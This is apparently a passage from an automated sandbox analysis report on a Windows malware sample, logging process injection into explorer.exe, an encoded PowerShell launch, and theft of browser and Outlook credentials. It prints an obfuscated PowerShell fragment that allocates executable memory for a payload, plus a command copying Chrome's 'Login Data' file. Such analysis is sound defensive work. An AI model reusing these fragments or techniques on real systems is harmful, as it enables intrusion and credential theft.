"soum" Test-Path "EXCLUD" $brnecykl3=0;$brnecykl9=1048576;$brnecykl8=[brnecykl1]::NtAllocateVirtualMemory(-1,[ref]$brnecykl3,0,[ref]$brnecykl9,12288,64)#SUPER STOCKILYR Stnkela5 emprost definitt Sepiabru1 topografer DRYPSTEN Frekv6 Delibe6 Matias3 husningkv Husm CHEESEFL vaag Thel Super5 sacrist
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3424
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6913.tmp" "c:\Users\user\AppData\Local\Temp\vsdke30k\CSC2B92EBAA3FFD4AC6819286896BCEF79.TMP"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: explorer.exe, 00000015.00000000.1015394640.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.1088990899.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.999045457.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000015.00000000.1016434591.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.999323407.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1036946610.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1089342683.0000000001080000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000015.00000000.1016434591.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1040185049.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.999323407.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1036946610.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1089342683.0000000001080000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000015.00000000.1016434591.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.999323407.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1036946610.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1089342683.0000000001080000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000015.00000000.1016434591.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.999323407.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1036946610.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1089342683.0000000001080000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000015.00000000.1043806795.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.1006326818.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

Remote Access Functionality

Source: Yara match File source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY